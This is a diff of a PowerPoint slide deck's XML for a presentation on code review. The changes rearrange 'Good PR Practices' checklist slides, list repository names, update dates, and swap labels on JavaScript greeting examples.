+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2399234039"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide15.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                 <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D803DA3F-89EE-E64F-A35F-2E446374D1DD}"/>
               </a:ext>
             </a:extLst>
@@ -5140,7 +5243,12 @@
             <p:ph type="title"/>
           </p:nvPr>
         </p:nvSpPr>
-        <p:spPr/>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="758952" y="779972"/>
+            <a:ext cx="3831336" cy="4754880"/>
+          </a:xfrm>
+        </p:spPr>
         <p:txBody>
           <a:bodyPr/>
           <a:lstStyle/>
@@ -5148,6 +5256,16 @@
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
               <a:t>Good PR Practices</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0"/>
+            </a:br>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Part 1</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -5245,6 +5363,121 @@
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
         <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2412893496"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide16.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D803DA3F-89EE-E64F-A35F-2E446374D1DD}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Good PR Practices</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0"/>
+            </a:br>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Part 2</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{886144D5-3FA5-3C41-A23D-1E892E6AB595}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="5184648" y="737932"/>
+            <a:ext cx="6245352" cy="5752017"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Is a property changed? Then verify it was changed everywhere!</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Is a property changed? Do we need to migrate the old property to the new property? If so, should we write a migration script?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1043878358"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -6019,7 +6252,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>In general we use spaces instead of </a:t>
+              <a:t>In general, we use spaces instead of </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" b="1" dirty="0"/>
@@ -6041,16 +6274,15 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>, https://</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>golang.org</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>/</a:t>
-            </a:r>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>https://golang.org/</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
             <a:r>
@@ -6248,16 +6480,15 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Classes should follow the SOLID principles, https://</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>en.wikipedia.org</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>/wiki/SOLID</a:t>
-            </a:r>
+              <a:t>Classes should follow the SOLID principles, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>https://en.wikipedia.org/wiki/SOLID</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
             <a:r>

--- a/code_review.pptx
+++ b/code_review.pptx
@@ -11,8 +11,8 @@
     <p:sldId id="259" r:id="rId5"/>
     <p:sldId id="261" r:id="rId6"/>
     <p:sldId id="263" r:id="rId7"/>
-    <p:sldId id="262" r:id="rId8"/>
-    <p:sldId id="264" r:id="rId9"/>
+    <p:sldId id="264" r:id="rId8"/>
+    <p:sldId id="262" r:id="rId9"/>
     <p:sldId id="271" r:id="rId10"/>
     <p:sldId id="266" r:id="rId11"/>
     <p:sldId id="267" r:id="rId12"/>
@@ -20,7 +20,8 @@
     <p:sldId id="268" r:id="rId14"/>
     <p:sldId id="269" r:id="rId15"/>
     <p:sldId id="270" r:id="rId16"/>
-    <p:sldId id="272" r:id="rId17"/>
+    <p:sldId id="275" r:id="rId17"/>
+    <p:sldId id="272" r:id="rId18"/>
   </p:sldIdLst>
   <p:sldSz cx="12192000" cy="6858000"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -548,7 +549,7 @@
           <a:p>
             <a:fld id="{53BEF823-48A5-43FC-BE03-E79964288B41}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>9/23/21</a:t>
+              <a:t>10/1/21</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -759,7 +760,7 @@
             <a:fld id="{53BEF823-48A5-43FC-BE03-E79964288B41}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr algn="r"/>
-              <a:t>9/23/21</a:t>
+              <a:t>10/1/21</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -974,7 +975,7 @@
             <a:fld id="{53BEF823-48A5-43FC-BE03-E79964288B41}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr algn="r"/>
-              <a:t>9/23/21</a:t>
+              <a:t>10/1/21</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -1177,7 +1178,7 @@
             <a:fld id="{53BEF823-48A5-43FC-BE03-E79964288B41}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr algn="r"/>
-              <a:t>9/23/21</a:t>
+              <a:t>10/1/21</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -1461,7 +1462,7 @@
             <a:fld id="{53BEF823-48A5-43FC-BE03-E79964288B41}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr algn="r"/>
-              <a:t>9/23/21</a:t>
+              <a:t>10/1/21</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -1705,7 +1706,7 @@
             <a:fld id="{53BEF823-48A5-43FC-BE03-E79964288B41}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr algn="r"/>
-              <a:t>9/23/21</a:t>
+              <a:t>10/1/21</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -2148,7 +2149,7 @@
             <a:fld id="{53BEF823-48A5-43FC-BE03-E79964288B41}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr algn="r"/>
-              <a:t>9/23/21</a:t>
+              <a:t>10/1/21</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -2294,7 +2295,7 @@
             <a:fld id="{53BEF823-48A5-43FC-BE03-E79964288B41}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr algn="r"/>
-              <a:t>9/23/21</a:t>
+              <a:t>10/1/21</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -2412,7 +2413,7 @@
             <a:fld id="{53BEF823-48A5-43FC-BE03-E79964288B41}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr algn="r"/>
-              <a:t>9/23/21</a:t>
+              <a:t>10/1/21</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -2696,7 +2697,7 @@
             <a:fld id="{53BEF823-48A5-43FC-BE03-E79964288B41}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr algn="r"/>
-              <a:t>9/23/21</a:t>
+              <a:t>10/1/21</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -2991,7 +2992,7 @@
             <a:fld id="{53BEF823-48A5-43FC-BE03-E79964288B41}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr algn="r"/>
-              <a:t>9/23/21</a:t>
+              <a:t>10/1/21</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -3486,7 +3487,7 @@
             <a:fld id="{53BEF823-48A5-43FC-BE03-E79964288B41}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr algn="r"/>
-              <a:t>9/23/21</a:t>
+              <a:t>10/1/21</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -5250,22 +5251,21 @@
           </a:xfrm>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Good PR Practices</a:t>
+          <a:bodyPr>
+            <a:normAutofit fontScale="90000"/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Good PR Practices </a:t>
             </a:r>
             <a:br>
               <a:rPr lang="en-US" dirty="0"/>
             </a:br>
-            <a:br>
-              <a:rPr lang="en-US" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Part 1</a:t>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>(Coming soon to a repository near you!)</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -5300,62 +5300,26 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Verify its tests. Is it covering enough cases?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Is the code legible?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Does the code follow the SOLID principles?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Read the associated Jira Issue. Does it solve the problem?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Is there similar code in the codebase that can be leveraged?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Is user input encoded correctly (for database storage, file storage)?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Can user input cause a stack overflow exception (infinite loop)?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>What would happen if the user inputs a file that is too large?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Does the code have side-effects?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+              <a:t>EMCM-WEB</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>DCL-UI</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>DCL-UE</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>DXP-SRE-TOOLS</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -5373,6 +5337,168 @@
 </file>
 
 <file path=ppt/slides/slide16.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D803DA3F-89EE-E64F-A35F-2E446374D1DD}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="758952" y="779972"/>
+            <a:ext cx="3831336" cy="4754880"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Good PR Practices</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0"/>
+            </a:br>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Part 1</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{886144D5-3FA5-3C41-A23D-1E892E6AB595}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="5184648" y="758952"/>
+            <a:ext cx="6245352" cy="5752017"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Verify its tests. Is it covering enough cases?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Is the code legible?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Does the code follow the SOLID principles?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Read the associated Jira Issue. Does it solve the problem?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Is there similar code in the codebase that can be leveraged?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Is user input encoded correctly (for database storage, file storage)?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Can user input cause a stack overflow exception (infinite loop)?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>What would happen if the user inputs a file that is too large?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Does the code have side-effects?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3028166912"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide17.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -6931,7 +7057,7 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" sz="3600" dirty="0"/>
-              <a:t>Good Example</a:t>
+              <a:t>(Less) Good Example</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -6948,7 +7074,7 @@
               <a:rPr lang="en-US" dirty="0">
                 <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
               </a:rPr>
-              <a:t>if (</a:t>
+              <a:t>return </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1">
@@ -6960,7 +7086,7 @@
               <a:rPr lang="en-US" dirty="0">
                 <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
               </a:rPr>
-              <a:t>) {</a:t>
+              <a:t> </a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -6971,7 +7097,7 @@
               <a:rPr lang="en-US" dirty="0">
                 <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
               </a:rPr>
-              <a:t>  return `Hello ${name}`;</a:t>
+              <a:t>  ? `Hello ${name}` </a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -6982,26 +7108,7 @@
               <a:rPr lang="en-US" dirty="0">
                 <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
               </a:rPr>
-              <a:t>}</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
-              </a:rPr>
-              <a:t>return "Hello Bob";</a:t>
+              <a:t>  : "Hello Bob";</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -7009,7 +7116,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2842230121"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="84674017"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -7101,7 +7208,7 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" sz="3600" dirty="0"/>
-              <a:t>(Less) Good Example</a:t>
+              <a:t>Good Example</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -7118,7 +7225,7 @@
               <a:rPr lang="en-US" dirty="0">
                 <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
               </a:rPr>
-              <a:t>return </a:t>
+              <a:t>if (</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1">
@@ -7130,7 +7237,48 @@
               <a:rPr lang="en-US" dirty="0">
                 <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
               </a:rPr>
-              <a:t> ? `Hello ${name}` : "Hello Bob";</a:t>
+              <a:t>) {</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>  return `Hello ${name}`;</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>}</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>return "Hello Bob";</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -7138,7 +7286,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="84674017"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2842230121"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
